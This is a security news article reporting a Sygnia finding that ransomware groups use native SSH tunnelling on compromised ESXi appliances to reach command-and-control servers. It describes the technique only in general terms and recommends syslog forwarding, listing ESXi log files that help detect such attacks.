Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|
Advertisement

Ad Placeholder

Full Width × 90

Breaking News

ESXi ransomware attacks use SSH tunnels to avoid detection

Threat actors behind ESXi ransomware attacks target virtualized environments using SSH tunneling to avoid detection. Researchers at cybersecurity firm Sygnia warn that threat actors behind ESXi ransomware attacks target virtualized environments using SSH tunneling to avoid detection. Ransomware groups are exploiting unmonitored ESXi appliances to persist and access corporate networks. They use “living-off-the-land” techniques, leveraging […]

ESXi ransomware attacks

Threat actors behind ESXi ransomware attacks target virtualized environments using SSH tunneling to avoid detection.

Researchers at cybersecurity firm Sygnia warn that threat actors behind ESXi ransomware attacks target virtualized environments using SSH tunneling to avoid detection.

Ransomware groups are exploiting unmonitored ESXi appliances to persist and access corporate networks. They use “living-off-the-land” techniques, leveraging native tools like SSH to create undetected SOCKS tunnels for communication with C2 servers.

The researcher reported that in many cases, attackers compromised the ESXi appliances either by using administrative credentials or by exploiting a known vulnerability to bypass the authentication. 

Once gained access to the device, attackers set up the tunneling using the native SSH functionality or by deploying other common tools with similar capabilities.

ESXi appliances’ resilience makes them ideal for tunneling, providing a semi-persistent backdoor within the network.

ESXi ransomware attacks

ESXi appliances splits logs into multiple files by activity, complicating forensic investigations and monitoring activities. Configuring log forwarding is essential to streamline monitoring and centralize event capture.

“While ESXi does support a few third-party monitoring or telemetry agents, such tools are limited in availability. As a more comprehensive and cost-effective solution, configuring syslog forwarding from the ESXi server to an external syslog server can solve the issue. This setup enables centralized monitoring of all activities within the ESXi server and serves as a means of log retention.” reads the Sygnia report.

“The following key log files are the most important ESXi telemetry files that will often assist with detecting and investigating an attack using SSH tunneling techniques on the appliance: 

  • /var/log/vobd.log (VMware observer daemon log) “
  • /var/log/shell.log (ESXi shell activity log) 
  • /var/log/hostd.log (Host agent log) 
  • /var/log/auth.log (authentication log) “

The report provided multiple examples of common activities and messages found in ESXi syslog files  that might be associated to malicious activity. 

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, ESXi ransomware attacks)